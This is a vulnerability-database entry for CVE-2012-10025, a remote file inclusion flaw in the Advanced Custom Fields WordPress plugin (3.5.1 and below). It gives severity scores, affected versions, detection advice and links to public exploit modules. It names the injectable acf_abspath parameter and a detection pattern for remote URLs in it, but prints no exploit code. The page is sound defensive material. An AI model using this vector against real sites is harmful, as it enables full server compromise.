CVE-2012-10025
published 2025-08-05CVE-2012-10025: The WordPress plugin Advanced Custom Fields (ACF) version 3.5.1 and below contains a remote file inclusion (RFI) vulnerability in core/actions/export.php. When…
PriorityP272critical10CVSS 4.0
AVNACLATNPRNUINVCHVIHVAHSCHSIHSAHEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
EXPLOIT
EPSS
1.22%
65.0th percentile
The WordPress plugin Advanced Custom Fields (ACF) version 3.5.1 and below contains a remote file inclusion (RFI) vulnerability in core/actions/export.php. When the PHP configuration directive allow_url_include is enabled (default: Off), an unauthenticated attacker can exploit the acf_abspath POST parameter to include and execute arbitrary remote PHP code. This leads to remote code execution under the web server’s context, allowing full compromise of the host.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| advanced_custom_fields | wordpress_plugin | <= 3.5.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor POST requests targeting the export.php script within the Advanced Custom Fields plugin path for external URLs in the acf_abspath parameter, which would indicate an RFI attempt. ↗
- →Flag any POST request where the acf_abspath parameter contains an http:// or https:// URL, as this is the injection vector for remote code execution. ↗
- →Exploitation is only possible when the PHP directive allow_url_include is enabled; audit PHP configurations for this setting as a risk indicator. ↗
- ·Exploitation requires the non-default PHP configuration directive allow_url_include to be enabled; the vulnerability is NOT exploitable in default PHP installations. ↗
- ·Only Advanced Custom Fields plugin versions 3.5.1 and below are affected; detections should be scoped accordingly. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://web.archive.org/web/20121223025326/http://secunia.com:80/advisories/51037https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rbhttps://wordpress.org/plugins/advanced-custom-fields/https://wpscan.com/vulnerability/d132d93b-509c-490d-8001-87147ed28c5e/https://www.exploit-db.com/exploits/23856https://www.tenable.com/plugins/nessus/63326https://www.vulncheck.com/advisories/wordpress-plugin-advanced-custom-fields-remote-file-inclusionhttps://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-custom-fields/advanced-custom-fields-351-remote-code-execution-via-remote-file-inclusionhttps://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rbhttps://www.exploit-db.com/exploits/23856
2025-08-05
Published